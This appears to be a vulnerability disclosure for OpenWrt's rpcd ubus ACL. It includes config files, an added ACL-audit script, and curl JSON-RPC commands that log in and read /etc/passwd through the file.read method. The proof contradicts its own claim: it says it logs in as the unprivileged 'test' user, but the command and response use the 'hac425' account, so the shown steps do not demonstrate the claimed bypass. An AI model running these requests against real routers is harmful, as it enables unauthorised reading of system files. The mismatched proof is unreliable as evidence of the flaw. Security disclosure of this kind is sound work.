Users can access ubus over HTTP. This path depends on the rpcd service. When rpcd's ACL is misconfigured, the ACL can stop working entirely.

Steps to reproduce the problem

First you need a machine running OpenWrt, then install uhttpd and luci to provide the HTTP service:

    opkg update
    opkg install luci

Then install some tools for adding users in OpenWrt:

    opkg install shadow-common
    opkg install shadow-useradd
    opkg install rpcd-mod-file

Then I add two users and allow them to log in to rpcd by modifying the rpcd config file:

    root@OpenWrt:~# cat /etc/config/rpcd
    config login
            option username 'hac425'
            option password '$p$hac425'
            list read '*'
            list write '*'
    config login
            option username 'test'
            option password '$p$test'
            list read '*'
            list write '*'

Next I create a config file that provides an ACL for the user whose username is hac425 (the config file comes from the OpenWrt wiki):

    root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json
    {
        "hac425": {
            "description": "acl for hac425",
            "read": {
                "ubus": {
                    "file": [ "*" ],
                    "log": [ "*" ],
                    "service": [ "*" ]
                }
            },
            "write": {
                "ubus": {
                    "file": [ "*" ],
                    "log": [ "*" ],
                    "service": [ "*" ]
                }
            }
        }
    }

This lets hac425 call all methods in the file namespace ( "file": [ "*" ] ).

I didn't create an ACL file for the user named test, which means the test user should only be able to call the methods defined in unauthenticated.json.

However, when I tested it, I found that the user test can also call the methods which are only allowed to the hac425 user.

For example, the test user can call the read method in the file namespace, which is not permitted to him.

I will show it below.

First I log in with the test user's username and password and get the ubus_rpc_session (this value is used to call the other methods defined in the ACL config files):

    06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123" } ] }'  http://192.168.31.111/ubus
    {"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}

Then use the ubus_rpc_session to call the read method in the file namespace to read the content of /etc/passwd:

    06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }'  http://192.168.31.111/ubus
    {"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nhac425:x:1000:1000::\/home\/hac425:\ntest:x:1001:1001::\/home\/test:\n"}]}

So we get the file content.

This means that I can use the test user to call the read method, which is not permitted to the test user.

The ACL is bypassed.
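To see how the ACL files and the rpcd login sections above combine into a session's permissions, here is an added audit script (my own code, not part of the original post or of rpcd). It assumes rpcd grants a login every ACL group in acl.d whose name matches an entry of its `list read` / `list write`, so a bare '*' matches every group; the unauthenticated.json body and the corrected config are constructed for illustration.

```python
import fnmatch
import json

# Constructed inputs modelled on the post's setup: the two /etc/config/rpcd login
# sections and the acl.d files. The unauthenticated.json body is an assumption
# (the post names the file but does not show its content).
RPCD_LOGINS = {
    "hac425": {"read": ["*"], "write": ["*"]},
    "test": {"read": ["*"], "write": ["*"]},
}
FIXED_LOGINS = {  # constructed: each login names only the ACL groups meant for it
    "hac425": {"read": ["hac425", "unauthenticated"], "write": ["hac425"]},
    "test": {"read": ["unauthenticated"], "write": []},
}
ACL_DIR = {
    "hac425.json": json.loads('{"hac425": {"description": "acl for hac425",'
        ' "read": {"ubus": {"file": ["*"], "log": ["*"], "service": ["*"]}},'
        ' "write": {"ubus": {"file": ["*"], "log": ["*"], "service": ["*"]}}}}'),
    "unauthenticated.json": json.loads('{"unauthenticated": {'
        ' "read": {"ubus": {"session": ["access", "login"]}}}}'),
}

def granted_groups(login, scope, acl_dir):
    """ACL group names a login section receives for scope "read"/"write".
    Assumed rpcd behaviour: every list entry is matched against every top-level
    key of every acl.d file, so a bare '*' grants all groups on the box."""
    groups = [g for doc in acl_dir.values() for g in doc]
    return {g for pat in login.get(scope, []) for g in groups if fnmatch.fnmatchcase(g, pat)}

def effective_ubus_acl(username, logins, acl_dir):
    """Merge ubus namespace -> methods supplied by every granted group and scope."""
    acl = {}
    for scope in ("read", "write"):
        for group in granted_groups(logins[username], scope, acl_dir):
            for doc in acl_dir.values():
                for ns, methods in doc.get(group, {}).get(scope, {}).get("ubus", {}).items():
                    acl.setdefault(ns, set()).update(methods)
    return acl

def can_call(username, namespace, method, logins, acl_dir):
    """True if the merged ACL allows namespace.method ("*" is a method wildcard)."""
    return any(m in ("*", method) for m in effective_ubus_acl(username, logins, acl_dir).get(namespace, ()))

def wildcard_logins(logins):
    """Logins whose read or write list holds '*': they inherit every other user's ACL file."""
    return sorted(u for u, l in logins.items() if "*" in l.get("read", []) + l.get("write", []))

if __name__ == "__main__":
    print("logins granted every ACL group:", wildcard_logins(RPCD_LOGINS))
    for logins in (RPCD_LOGINS, FIXED_LOGINS):
        print("test can call file.read:", can_call("test", "file", "read", logins, ACL_DIR))
```

With the post's config the script reports that test can call file.read; with the corrected login sections it cannot, while session.login stays available.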

Conclusion

This vulnerability can cause the rpcd ACL to stop working.

It lets a malicious user call methods which only another user is permitted to call.
